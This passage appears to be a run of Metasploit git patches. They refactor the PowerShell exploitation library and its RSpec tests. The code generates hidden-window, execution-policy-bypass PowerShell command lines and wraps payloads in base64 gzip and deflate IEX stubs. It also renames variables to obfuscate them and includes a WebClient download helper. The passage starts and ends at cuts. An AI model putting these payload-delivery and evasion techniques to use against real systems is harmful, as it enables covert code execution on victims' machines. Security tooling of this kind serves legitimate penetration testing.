-        code.include?('-NoProfile -WindowStyle hidden -NoExit -Command').should be_true
-      end
-    end
-
-    context 'when method is net' do
-      before do
-        subject.datastore['Powershell::method'] = 'net'
-        subject.options.validate(subject.datastore)
-      end
-      it 'should generate a command line' do
-        code = subject.cmd_psh_payload(payload, arch)
-        decompress(code).include?('System.Runtime.InteropServices;').should be_true
-      end
-    end
-
-    context 'when method is reflection' do
-      before do
-        subject.datastore['Powershell::method'] = 'reflection'
-        subject.options.validate(subject.datastore)
-      end
-      it 'should generate a command line' do
-        code = subject.cmd_psh_payload(payload, arch)
-        decompress(code).include?('GlobalAssemblyCache').should be_true
-      end
-    end
-
-    context 'when method is msil' do
-      before do
-        subject.datastore['Powershell::method'] = 'msil'
-        subject.options.validate(subject.datastore)
-      end
-      it 'should raise an exception' do
-        except = false
-        begin
-          subject.cmd_psh_payload(payload, arch)
-        rescue RuntimeError
-          except = true
-        end
-        except.should be_true
-      end
-    end
-
-    context 'when method is unknown' do
-      before do
-        subject.datastore['Powershell::method'] = 'blah'
-      end
-      it 'should raise an exception' do
-        except = false
-        begin
-          subject.cmd_psh_payload(payload, arch)
-        rescue RuntimeError
-          except = true
-        end
-        except.should be_true
-      end
-      after do
-        subject.datastore['Powershell::method'] = 'reflection'
-        subject.options.validate(subject.datastore)
-      end
-    end
-
-    context 'when encode_inner_payload' do
-      it 'should contain an inner payload with -e' do
-          code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true})
-          code.include?(' -e ').should be_true
-      end
-
-      context 'when no_equals is true' do
-        it 'should raise an exception' do
-          except = false
-          begin
-            code = subject.cmd_psh_payload(payload, arch, {:encode_inner_payload => true, :no_equals => true})
-          rescue RuntimeError
-            except = true
-          end
-          except.should be_true
-        end
-      end
-    end
-
-    context 'when encode_final_payload' do
-      context 'when no_equals is false' do
-        it 'should contain a final payload with -e' do
-          code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => false})
-          code.include?(' -e ').should be_true
-          code.include?(' -c ').should be_false
-        end
-      end
-      context 'when no_equals is true' do
-        it 'should contain a final payload with -e' do
-          code = subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :no_equals => true})
-          code.include?(' -e ').should be_true
-          code.include?(' -c ').should be_false
-          code.include?('=').should be_false
-        end
-      end
-    end
-
-    context 'when remove_comspec' do
-      it 'shouldnt contain %COMSPEC%' do
-        code = subject.cmd_psh_payload(payload, arch, {:remove_comspec => true})
-        code.include?('%COMSPEC%').should be_false
-      end
-    end
-
-    context 'when use single quotes' do
-      it 'should wrap in single quotes' do
-        code = subject.cmd_psh_payload(payload, arch, {:use_single_quotes => true})
-        code.include?(' -c \'').should be_true
-      end
-    end
-  end
-
-  describe "::generate_psh_command_line" do
-    it 'should contain no full stop when :no_full_stop' do
-      opts = {:no_full_stop => true}
-      command = subject.generate_psh_command_line(opts)
-      command.include?("powershell ").should be_true
-    end
-
-    it 'should contain full stop unless :no_full_stop' do
-      opts = {}
-      command = subject.generate_psh_command_line(opts)
-      command.include?("powershell.exe ").should be_true
-
-      opts = {:no_full_stop => false}
-      command = subject.generate_psh_command_line(opts)
-      command.include?("powershell.exe ").should be_true
-    end
-
-    it 'should ensure the path should always ends with \\' do
-      opts = {:path => "test"}
-      command = subject.generate_psh_command_line(opts)
-      command.include?("test\\powershell.exe ").should be_true
-
-      opts = {:path => "test\\"}
-      command = subject.generate_psh_command_line(opts)
-      command.include?("test\\powershell.exe ").should be_true
-    end
-  end
-
-  describe "::generate_psh_args" do
-    it 'should return empty string for nil opts' do
-      subject.generate_psh_args(nil).should eql ""
-    end
-
-    command_args = [[:encodedcommand, "parp"],
-                    [:executionpolicy, "bypass"],
-                    [:inputformat, "xml"],
-                    [:file, "x"],
-                    [:noexit, true],
-                    [:nologo, true],
-                    [:noninteractive, true],
-                    [:mta, true],
-                    [:outputformat, 'xml'],
-                    [:sta, true],
-                    [:noprofile, true],
-                    [:windowstyle, "hidden"],
-                    [:command, "Z"]
-    ]
-
-    permutations = (0..command_args.length).to_a.combination(2).map{|i,j| command_args[i...j]}
-
-    permutations.each do |perms|
-      opts = {}
-      perms.each do |k,v|
-        opts[k] = v
-        it "should generate correct arguments for #{opts}" do
-          opts[:shorten] = true
-          short_args = subject.generate_psh_args(opts)
-          opts[:shorten] = false
-          long_args = subject.generate_psh_args(opts)
-
-          opt_length = opts.length - 1
-
-          short_args.should_not be_nil
-          long_args.should_not be_nil
-          short_args.count('-').should eql opt_length
-          long_args.count('-').should eql opt_length
-          short_args[0].should_not eql " "
-          long_args[0].should_not eql " "
-          short_args[-1].should_not eql " "
-          long_args[-1].should_not eql " "
-
-          if opts[:command]
-            long_args[-10..-1].should eql "-Command Z"
-            short_args[-4..-1].should eql "-c Z"
-          end
-       end
-      end
-    end
-  end
-
-end
-
diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb
index c02f3c72a4..7d7d262e8d 100644
--- a/spec/lib/msf/core/exploit/powershell_spec.rb
+++ b/spec/lib/msf/core/exploit/powershell_spec.rb
@@ -29,13 +29,6 @@ describe Msf::Exploit::Powershell do
     'x86'
   end
 
-  describe "::read_script" do
-    it 'should read a sample script file' do
-      script = subject.read_script(example_script)
-      script.should be_kind_of(Rex::Exploitation::Powershell::Script)
-    end
-  end
-
   describe "::encode_script" do
     it 'should read and encode a sample script file' do
       script = subject.encode_script(example_script)

From d85e4b1313e91183f635f4d38a26b0b32bd02c31 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 25 Apr 2014 15:47:36 +0100
Subject: [PATCH 103/321] Error if encode_inner and encode_final

---
 spec/lib/msf/core/exploit/powershell_spec.rb | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb
index 7d7d262e8d..68bde38ab5 100644
--- a/spec/lib/msf/core/exploit/powershell_spec.rb
+++ b/spec/lib/msf/core/exploit/powershell_spec.rb
@@ -376,6 +376,17 @@ describe Msf::Exploit::Powershell do
           code.include?('=').should be_false
         end
       end
+      context 'when encode_inner_payload is true' do
+        it 'should raise an exception' do
+          except = false
+          begin
+            subject.cmd_psh_payload(payload, arch, {:encode_final_payload => true, :encode_inner_payload => true})
+          rescue RuntimeError
+            except = true
+          end
+          except.should be_true
+        end
+      end
     end
 
     context 'when remove_comspec' do

From 3f5cc13bf881e1ad0ad237aea9c4836bcb6eed11 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 25 Apr 2014 17:15:12 +0100
Subject: [PATCH 104/321] Better eof test

---
 spec/lib/msf/core/exploit/powershell_spec.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb
index 68bde38ab5..21891ab345 100644
--- a/spec/lib/msf/core/exploit/powershell_spec.rb
+++ b/spec/lib/msf/core/exploit/powershell_spec.rb
@@ -49,7 +49,8 @@ describe Msf::Exploit::Powershell do
       it 'should create a compressed script with eof' do
         script = File.read(example_script)
         compressed = subject.compress_script(script, 'end_of_file')
-        compressed.length.should be < script.length
+        puts compressed
+        compressed.include?('end_of_file').should be_true
       end
     end
 

From 318ae46085a363cf429522d114e2bacf0fb44840 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 26 Apr 2014 12:59:19 +0100
Subject: [PATCH 105/321] Remove puts

---
 spec/lib/msf/core/exploit/powershell_spec.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb
index 21891ab345..3b67509ff3 100644
--- a/spec/lib/msf/core/exploit/powershell_spec.rb
+++ b/spec/lib/msf/core/exploit/powershell_spec.rb
@@ -49,7 +49,6 @@ describe Msf::Exploit::Powershell do
       it 'should create a compressed script with eof' do
         script = File.read(example_script)
         compressed = subject.compress_script(script, 'end_of_file')
-        puts compressed
         compressed.include?('end_of_file').should be_true
       end
     end

From be10c8e4acd3e6efc1bede93b1d107dd581d6a1c Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 26 Apr 2014 12:59:43 +0100
Subject: [PATCH 106/321] Split Rex::Exploitation::Powershell::* into
 individual files

---
 lib/rex/exploitation/powershell.rb            | 584 +-----------------
 lib/rex/exploitation/powershell/function.rb   |  56 ++
 lib/rex/exploitation/powershell/obfu.rb       |  98 +++
 lib/rex/exploitation/powershell/output.rb     | 150 +++++
 lib/rex/exploitation/powershell/param.rb      |  30 +
 lib/rex/exploitation/powershell/parser.rb     | 150 +++++
 .../exploitation/powershell/psh_methods.rb    |  75 +++
 lib/rex/exploitation/powershell/script.rb     | 112 ++++
 8 files changed, 678 insertions(+), 577 deletions(-)
 create mode 100644 lib/rex/exploitation/powershell/function.rb
 create mode 100644 lib/rex/exploitation/powershell/obfu.rb
 create mode 100644 lib/rex/exploitation/powershell/output.rb
 create mode 100644 lib/rex/exploitation/powershell/param.rb
 create mode 100644 lib/rex/exploitation/powershell/parser.rb
 create mode 100644 lib/rex/exploitation/powershell/psh_methods.rb
 create mode 100644 lib/rex/exploitation/powershell/script.rb

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index e7dd429dbb..c4a52c1213 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -1,7 +1,12 @@
 # -*- coding: binary -*-
 
-require 'zlib'
-require 'rex/text'
+require 'rex/exploitation/powershell/output'
+require 'rex/exploitation/powershell/parser'
+require 'rex/exploitation/powershell/obfu'
+require 'rex/exploitation/powershell/param'
+require 'rex/exploitation/powershell/function'
+require 'rex/exploitation/powershell/script'
+require 'rex/exploitation/powershell/psh_methods'
 
 module Rex
 module Exploitation
@@ -55,581 +60,6 @@ module Powershell
     new_subs
   end
 
-  module Output
-
-    #
-    # To String
-    #
-    # @return [String] Code
-    def to_s
-      code
-    end
-
-    #
-    # Returns code size
-    #
-    # @return [Integer] Code size
-    def size
-      code.size
-    end
-
-    #
-    # Return code with numbered lines
-    #
-    # @return [String] Powershell code with line numbers
-    def to_s_lineno
-      numbered = ''
-      code.split(/\r\n|\n/).each_with_index do |line,idx|
-        numbered << "#{idx}: #{line}"
-      end
-      return numbered
-    end
-
-    #
-    # Return a zlib compressed powershell code wrapped in decode stub
-    #
-    # @param eof [String] End of file identifier to append to code
-    #
-    # @return [String] Zlib compressed powershell code wrapped in
-    # decompression stub
-    def deflate_code(eof = nil)
-      # Compress using the Deflate algorithm
-      compressed_stream = ::Zlib::Deflate.deflate(code,
-      ::Zlib::BEST_COMPRESSION)
-
-      # Base64 encode the compressed file contents
-      encoded_stream = Rex::Text.encode_base64(compressed_stream)
-
-      # Build the powershell expression
-      # Decode base64 encoded command and create a stream object
-      psh_expression =  "$s=New-Object IO.MemoryStream(,"
-      psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
-      # Read & delete the first two bytes due to incompatibility with MS
-      psh_expression << "$s.ReadByte();"
-      psh_expression << "$s.ReadByte();"
-      # Uncompress and invoke the expression (execute)
-      psh_expression << "IEX (New-Object IO.StreamReader("
-      psh_expression << "New-Object IO.Compression.DeflateStream("
-      psh_expression << "$s,"
-      psh_expression << "[IO.Compression.CompressionMode]::Decompress)"
-      psh_expression << ")).ReadToEnd();"
-
-      # If eof is set, add a marker to signify end of code output
-      #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
-      psh_expression << "echo '#{eof}';" if eof
-
-      @code = psh_expression
-    end
-
-    #
-    # Return Base64 encoded powershell code
-    #
-    # @return [String] Base64 encoded powershell code
-    def encode_code
-      @code = Rex::Text.encode_base64(Rex::Text.to_unicode(code))
-    end
-
-    #
-    # Return a gzip compressed powershell code wrapped in decoder stub
-    #
-    # @param eof [String] End of file identifier to append to code
-    #
-    # @return [String] Gzip compressed powershell code wrapped in
-    # decompression stub
-    def gzip_code(eof = nil)
-      # Compress using the Deflate algorithm
-      compressed_stream = Rex::Text.gzip(code)
-
-      # Base64 encode the compressed file contents
-      encoded_stream = Rex::Text.encode_base64(compressed_stream)
-
-      # Build the powershell expression
-      # Decode base64 encoded command and create a stream object
-      psh_expression =  "$s=New-Object IO.MemoryStream(,"
-      psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
-      # Uncompress and invoke the expression (execute)
-      psh_expression << "IEX (New-Object IO.StreamReader("
-      psh_expression << "New-Object IO.Compression.GzipStream("
-      psh_expression << "$s,"
-      psh_expression << "[IO.Compression.CompressionMode]::Decompress)"
-      psh_expression << ")).ReadToEnd();"
-
-      # If eof is set, add a marker to signify end of code output
-      #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
-      psh_expression << "echo '#{eof}';" if eof
-
-      @code = psh_expression
-    end
-
-    #
-    # Compresses script contents with gzip (default) or deflate
-    #
-    # @param eof [String] End of file identifier to append to code
-    # @param gzip [Boolean] Whether to use gzip compression or deflate
-    # @param in_place [Boolean] Whether to update the current script
-    #   code or just return the output.
-    #
-    # @return [String] Compressed code wrapped in decompression stub
-    def compress_code(eof = nil, gzip = true, in_place = true)
-      code = gzip ? gzip_code(eof) : deflate_code(eof)
-      @code = code if in_place
-      return code
-    end
-
-    #
-    # Reverse the compression process
-    # Try gzip, inflate if that fails
-    #
-    # @return [String] Decompressed powershell code
-    def decompress_code
-      # Extract substring with payload
-      encoded_stream = @code.scan(/FromBase64String\('(.*)'/).flatten.first
-      # Decode and decompress the string
-      @code = ( Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) ) ||
-        Rex::Text.zlib_inflate( Rex::Text.decode_base64(encoded_stream)) )
-      return code
-    end
-  end
-
-  module Parser
-    # Reserved special variables
-    # Acquired with: Get-Variable | Format-Table name, value -auto
-    RESERVED_VARIABLE_NAMES = [
-        '$$',
-        '$?',
-        '$^',
-        '$_',
-        '$args',
-        '$ConfirmPreference',
-        '$ConsoleFileName',
-        '$DebugPreference',
-        '$Env',
-        '$Error',
-        '$ErrorActionPreference',
-        '$ErrorView',
-        '$ExecutionContext',
-        '$false',
-        '$FormatEnumerationLimit',
-        '$HOME',
-        '$Host',
-        '$input',
-        '$LASTEXITCODE',
-        '$MaximumAliasCount',
-        '$MaximumDriveCount',
-        '$MaximumErrorCount',
-        '$MaximumFunctionCount',
-        '$MaximumHistoryCount',
-        '$MaximumVariableCount',
-        '$MyInvocation',
-        '$NestedPromptLevel',
-        '$null',
-        '$OutputEncoding',
-        '$PID',
-        '$PROFILE',
-        '$ProgressPreference',
-        '$PSBoundParameters',
-        '$PSCulture',
-        '$PSEmailServer',
-        '$PSHOME',
-        '$PSSessionApplicationName',
-        '$PSSessionConfigurationName',
-        '$PSSessionOption',
-        '$PSUICulture',
-        '$PSVersionTable',
-        '$PWD',
-        '$ReportErrorShowExceptionClass',
-        '$ReportErrorShowInnerException',
-        '$ReportErrorShowSource',
-        '$ReportErrorShowStackTrace',
-        '$ShellId',
-        '$StackTrace',
-        '$true',
-        '$VerbosePreference',
-        '$WarningPreference',
-        '$WhatIfPreference'
-      ].map(&:downcase).freeze
-
-    #
-    # Get variable names from code, removes reserved names from return
-    #
-    def get_var_names
-      our_vars = code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten.map(&:strip)
-      return our_vars.select {|v| !RESERVED_VARIABLE_NAMES.include?(v.downcase)}
-    end
-
-    #
-    # Get function names from code
-    #
-    def get_func_names
-      return code.scan(/function\s([a-zA-Z\-\_]+)/).uniq.flatten
-    end
-
-    # Attempt to find string literals in PSH expression
-    def get_string_literals
-      code.scan(/@"(.*)"@|@'(.*)'@/)
-    end
-
-    #
-    # Scan code and return matches with index
-    #
-    def scan_with_index(str,source=code)
-      ::Enumerator.new do |y|
-        source.scan(str) do
-          y << ::Regexp.last_match
-        end
-      end.map{|m| [m.to_s,m.offset(0)[0]]}
-    end
-
-    #
-    # Return matching bracket type
-    #
-    def match_start(char)
-      case char
-      when '{'
-        '}'
-      when '('
-        ')'
-      when '['
-        ']'
-      when '<'
-        '>'
-      end
-    end
-
-    #
-    # Extract block of code between inside brackets/parens
-    #
-    # Attempts to match the bracket at idx, handling nesting manually
-    # Once the balanced matching bracket is found, all script content
-    # between idx and the index of the matching bracket is returned
-    #
-    def block_extract(idx)
-      start = code[idx]
-      stop = match_start(start)
-      delims = scan_with_index(/#{Regexp.escape(start)}|#{Regexp.escape(stop)}/,code[idx+1..-1])
-      delims.map {|x| x[1] = x[1] + idx + 1}
-      c = 1
-      sidx = nil
-      # Go through delims till we balance, get idx
-      while not c == 0 and x = delims.shift do
-        sidx = x[1]
-        x[0] == stop ? c -=1 : c+=1
-      end
-      return code[idx..sidx]
-    end
-
-    def get_func(func_name, delete = false)
-      start = code.index(func_name)
-      idx = code[start..-1].index('{') + start
-      func_txt = block_extract(idx)
-      code.delete(ftxt) if delete
-      return Function.new(func_name,func_txt)
-    end
-  end # Parser
-
-  module Obfu
-
-    #
-    # Create hash of string substitutions
-    #
-    def sub_map_generate(strings)
-      map = {}
-      strings.flatten.each do |str|
-        map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
-        # Ensure our variables are unique
-        while not map.values.uniq == map.values
-          map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
-        end
-      end
-      return map
-    end
-
-    #
-    # Remove comments
-    #
-    def strip_comments
-      # Multi line
-      code.gsub!(/<#(.*?)#>/m,'')
-      # Single line
-      code.gsub!(/^\s*#(?!.*region)(.*$)/i,'')
-    end
-
-    #
-    # Remove empty lines
-    #
-    def strip_empty_lines
-      # Windows EOL
-      code.gsub!(/[\r\n]+/,"\r\n")
-      # UNIX EOL
-      code.gsub!(/[\n]+/,"\n")
-    end
-
-    #
-    # Remove whitespace
-    # This can break some codes using inline .NET
-    #
-    def strip_whitespace
-      code.gsub!(/\s+/,' ')
-    end
-
-    #
-    # Identify variables and replace them
-    #
-    def sub_vars
-      # Get list of variables, remove reserved
-      vars = get_var_names
-      # Create map, sub key for val
-      sub_map_generate(vars).each do |var,sub|
-        code.gsub!(var,sub)
-      end
-    end
-
-    #
-    # Identify function names and replace them
-    #
-    def sub_funcs
-      # Find out function names, make map
-      # Sub map keys for values
-      sub_map_generate(get_func_names).each do |var,sub|
-        code.gsub!(var,sub)
-      end
-    end
-
-    #
-    # Perform standard substitutions
-    #
-    def standard_subs(subs = %w{strip_comments strip_whitespace sub_funcs sub_vars} )
-      # Save us the trouble of breaking injected .NET and such
-      subs.delete('strip_whitespace') unless string_literals.empty?
-      # Run selected modifiers
-      subs.each do |modifier|
-        self.send(modifier)
-      end
-      code.gsub!(/^$|^\s+$/,'')
-      return code
-    end
-
-  end # Obfu
-
-  class Param
-    attr_accessor :klass, :name
-    def initialize(klass,name)
-      @klass = klass.strip.gsub(/\[|\]|\s/,'')
-      @name = name.strip.gsub(/\s|,/,'')
-    end
-
-    #
-    # To String
-    #
-    # @return [String] Powershell param
-    def to_s
-      "[#{klass}]$#{name}"
-    end
-  end
-
-  class Function
-    attr_accessor :code, :name, :params
-
-    include Output
-    include Parser
-    include Obfu
-
-    def initialize(name,code)
-      @name = name
-      @code = code
-      populate_params
-    end
-
-    #
-    # To String
-    #
-    # @return [String] Powershell function
-    def to_s
-      "function #{name} #{code}"
-    end
-
-    #
-    # Identify the parameters from the code and 
-    # store as Param in @params
-    #
-    def populate_params
-      @params = []
-      start = code.index(/param\s+\(|param\(/im)
-      return unless start
-      # Get start of our block
-      idx = scan_with_index('(',code[start..-1]).first.last + start
-      pclause = block_extract(idx)
-      # Keep lines which declare a variable of some class
-      vars = pclause.split(/\n|;/).select {|e| e =~ /\]\$\w/}
-      vars.map! {|v| v.split('=',2).first}.map(&:strip)
-      # Ignore assignment, create params with class and variable names
-      vars.map {|e| e.split('$')}.each do |klass,name|
-        @params << Param.new(klass,name)
-      end
-    end
-  end
-
-  class Script
-    attr_accessor :code
-    attr_reader :functions
-
-    include Output
-    include Parser
-    include Obfu
-    # Pretend we are actually a string
-    extend Forwardable
-    # In case someone messes with String we delegate based on its instance methods
-    #eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
-    def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,
-                   :!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub,:dump, :match, :to_sym,
-                   :enum_for, :display, :tr_s!, :freeze, :gsub, :split, :rindex, :<<, :<=>, :+, :lstrip!,
-                   :encoding, :start_with?, :swapcase, :lstrip!, :encoding, :start_with?, :swapcase,
-                   :each_byte, :lstrip, :codepoints, :insert, :getbyte, :swapcase!, :delete, :rjust, :>=,
-                   :!, :count, :slice, :clone, :chop!, :prepend, :succ!, :upcase, :include?, :frozen?,
-                   :delete!, :chop, :lines, :replace, :next, :=~, :==, :rstrip!, :%, :upcase!, :each_char,
-                   :hash, :rstrip, :length, :reverse, :setbyte, :bytesize, :squeeze, :>, :center, :[],
-                   :<=, :to_c, :slice!, :chomp!, :next!, :downcase, :unpack, :crypt, :partition,
-                   :between?, :squeeze!, :to_s, :chomp, :bytes, :clear, :!~, :to_i, :valid_encoding?, :===,
-                   :tr, :downcase!, :scan, :sub!, :each_codepoint, :reverse!, :class, :size, :empty?, :byteslice,
-                   :initialize_clone, :to_str, :to_enum,:tap, :tr!, :trust, :encode!, :sub, :oct, :succ, :index,
-                   :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
-                   :end_with?
-
-    def initialize(code)
-      @code = ''
-      begin
-        # Open code file for reading
-        fd = ::File.new(code, 'rb')
-        while (line = fd.gets)
-          @code << line
-        end
-
-        # Close open file
-        fd.close
-      rescue Errno::ENAMETOOLONG, Errno::ENOENT
-        # Treat code as a... code
-        @code = code.to_s.dup # in case we're eating another script
-      end
-      @functions = get_func_names.map {|f| get_func(f)}
-    end
-
-
-    ##
-    # Class methods
-    ##
-
-    #
-    # Convert binary to byte array, read from file if able
-    #
-    # @param input_data [String] Path to powershell file or powershell
-    #   code string
-    # @param var_name [String] Byte array variable name
-    #
-    # @return [String] input_data as a powershell byte array
-    def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-      # File will raise an exception if the path contains null byte
-      if input_data.include? "\x00"
-        code = input_data
-      else
-        code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-      end
-
-      code = code.unpack('C*')
-      psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
-      lines = []
-      1.upto(code.length-1) do |byte|
-        if(byte % 10 == 0)
-          lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
-        else
-          lines.push ",0x#{code[byte].to_s(16)}"
-        end
-      end
-
-      return psh << lines.join("") + "\r\n"
-    end
-
-    #
-    # ?? RageLtMan
-    #
-    # @param dir [String] ?
-    def self.psp_funcs(dir)
-      scripts = Dir.glob(File.expand_path(dir) + '/**/*').select {|e| e =~ /ps1$|psm1$/}
-      functions = scripts.map {|s| puts s; Script.new(s).functions}
-      return functions.flatten
-    end
-
-    #
-    # Return list of code modifier methods
-    #
-    # @return [Array] Code modifiers
-    def self.code_modifiers
-      self.instance_methods.select {|m| m =~ /^(strip|sub)/}
-    end
-  end # class Script
-
-  ##
-  # Convenience methods for generating powershell code in Ruby
-  ##
-  
-  module PshMethods
-
-    #
-    # Download file via .NET WebClient
-    #
-    # @param src [String] URL to the file
-    # @param target [String] Location to save the file
-    #
-    # @return [String] Powershell code to download a file
-    def self.download(src,target=nil)
-      target ||= '$pwd\\' << src.split('/').last
-      return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
-    end
-
-    #
-    # Uninstall app, or anything named like app
-    #
-    # @param app [String] Name of application
-    # @param fuzzy [Boolean] Whether to apply a fuzzy match (-like) to
-    #   the application name
-    #
-    # @return [String] Powershell code to uninstall an application
-    def self.uninstall(app,fuzzy=true)
-      match = fuzzy ? '-like' : '-eq'
-      return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
-    end
-
-    #
-    # Create secure string from plaintext
-    #
-    # @param str [String] String to create as a SecureString
-    #
-    # @return [String] Powershell code to create a SecureString
-    def self.secure_string(str)
-      return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
-    end
-
-    #
-    # Find PID of file lock owner
-    #
-    # @param filename [String] Filename
-    #
-    # @return [String] Powershell code to identify the PID of a file
-    #   lock owner
-    def self.who_locked_file?(filename)
-      return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
-    end
-
-    #
-    # Return last time of login
-    #
-    # @param user [String] Username
-    #
-    # @return [String] Powershell code to return the last time of a user
-    #   login
-    def self.get_last_login(user)
-      return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
-    end
-  end
 end
 end
 end
diff --git a/lib/rex/exploitation/powershell/function.rb b/lib/rex/exploitation/powershell/function.rb
new file mode 100644
index 0000000000..748a2dd328
--- /dev/null
+++ b/lib/rex/exploitation/powershell/function.rb
@@ -0,0 +1,56 @@
+# -*- coding: binary -*-
+
+require 'zlib'
+require 'rex/text'
+
+module Rex
+module Exploitation
+
+module Powershell
+
+  class Function
+    attr_accessor :code, :name, :params
+
+    include Output
+    include Parser
+    include Obfu
+
+    def initialize(name,code)
+      @name = name
+      @code = code
+      populate_params
+    end
+
+    #
+    # To String
+    #
+    # @return [String] Powershell function
+    def to_s
+      "function #{name} #{code}"
+    end
+
+    #
+    # Identify the parameters from the code and
+    # store as Param in @params
+    #
+    def populate_params
+      @params = []
+      start = code.index(/param\s+\(|param\(/im)
+      return unless start
+      # Get start of our block
+      idx = scan_with_index('(',code[start..-1]).first.last + start
+      pclause = block_extract(idx)
+      # Keep lines which declare a variable of some class
+      vars = pclause.split(/\n|;/).select {|e| e =~ /\]\$\w/}
+      vars.map! {|v| v.split('=',2).first}.map(&:strip)
+      # Ignore assignment, create params with class and variable names
+      vars.map {|e| e.split('$')}.each do |klass,name|
+        @params << Param.new(klass,name)
+      end
+    end
+  end
+
+end
+end
+end
+
diff --git a/lib/rex/exploitation/powershell/obfu.rb b/lib/rex/exploitation/powershell/obfu.rb
new file mode 100644
index 0000000000..2a1d364884
--- /dev/null
+++ b/lib/rex/exploitation/powershell/obfu.rb
@@ -0,0 +1,98 @@
+# -*- coding: binary -*-
+
+require 'zlib'
+require 'rex/text'
+
+module Rex
+module Exploitation
+
+module Powershell
+
+  module Obfu
+
+    #
+    # Create hash of string substitutions
+    #
+    def sub_map_generate(strings)
+      map = {}
+      strings.flatten.each do |str|
+        map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
+        # Ensure our variables are unique
+        while not map.values.uniq == map.values
+          map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
+        end
+      end
+      return map
+    end
+
+    #
+    # Remove comments
+    #
+    def strip_comments
+      # Multi line
+      code.gsub!(/<#(.*?)#>/m,'')
+      # Single line
+      code.gsub!(/^\s*#(?!.*region)(.*$)/i,'')
+    end
+
+    #
+    # Remove empty lines
+    #
+    def strip_empty_lines
+      # Windows EOL
+      code.gsub!(/[\r\n]+/,"\r\n")
+      # UNIX EOL
+      code.gsub!(/[\n]+/,"\n")
+    end
+
+    #
+    # Remove whitespace
+    # This can break some codes using inline .NET
+    #
+    def strip_whitespace
+      code.gsub!(/\s+/,' ')
+    end
+
+    #
+    # Identify variables and replace them
+    #
+    def sub_vars
+      # Get list of variables, remove reserved
+      vars = get_var_names
+      # Create map, sub key for val
+      sub_map_generate(vars).each do |var,sub|
+        code.gsub!(var,sub)
+      end
+    end
+
+    #
+    # Identify function names and replace them
+    #
+    def sub_funcs
+      # Find out function names, make map
+      # Sub map keys for values
+      sub_map_generate(get_func_names).each do |var,sub|
+        code.gsub!(var,sub)
+      end
+    end
+
+    #
+    # Perform standard substitutions
+    #
+    def standard_subs(subs = %w{strip_comments strip_whitespace sub_funcs sub_vars} )
+      # Save us the trouble of breaking injected .NET and such
+      subs.delete('strip_whitespace') unless string_literals.empty?
+      # Run selected modifiers
+      subs.each do |modifier|
+        self.send(modifier)
+      end
+      code.gsub!(/^$|^\s+$/,'')
+      return code
+    end
+
+  end # Obfu
+
+end
+end
+end
+
diff --git a/lib/rex/exploitation/powershell/output.rb b/lib/rex/exploitation/powershell/output.rb
new file mode 100644
index 0000000000..19e5a4fc23
--- /dev/null
+++ b/lib/rex/exploitation/powershell/output.rb
@@ -0,0 +1,150 @@
+# -*- coding: binary -*-
+
+require 'zlib'
+require 'rex/text'
+
+module Rex
+module Exploitation
+
+module Powershell
+
+  module Output
+
+    #
+    # To String
+    #
+    # @return [String] Code
+    def to_s
+      code
+    end
+
+    #
+    # Returns code size
+    #
+    # @return [Integer] Code size
+    def size
+      code.size
+    end
+
+    #
+    # Return code with numbered lines
+    #
+    # @return [String] Powershell code with line numbers
+    def to_s_lineno
+      numbered = ''
+      code.split(/\r\n|\n/).each_with_index do |line,idx|
+        numbered << "#{idx}: #{line}"
+      end
+      return numbered
+    end
+
+    #
+    # Return a zlib compressed powershell code wrapped in decode stub
+    #
+    # @param eof [String] End of file identifier to append to code
+    #
+    # @return [String] Zlib compressed powershell code wrapped in
+    # decompression stub
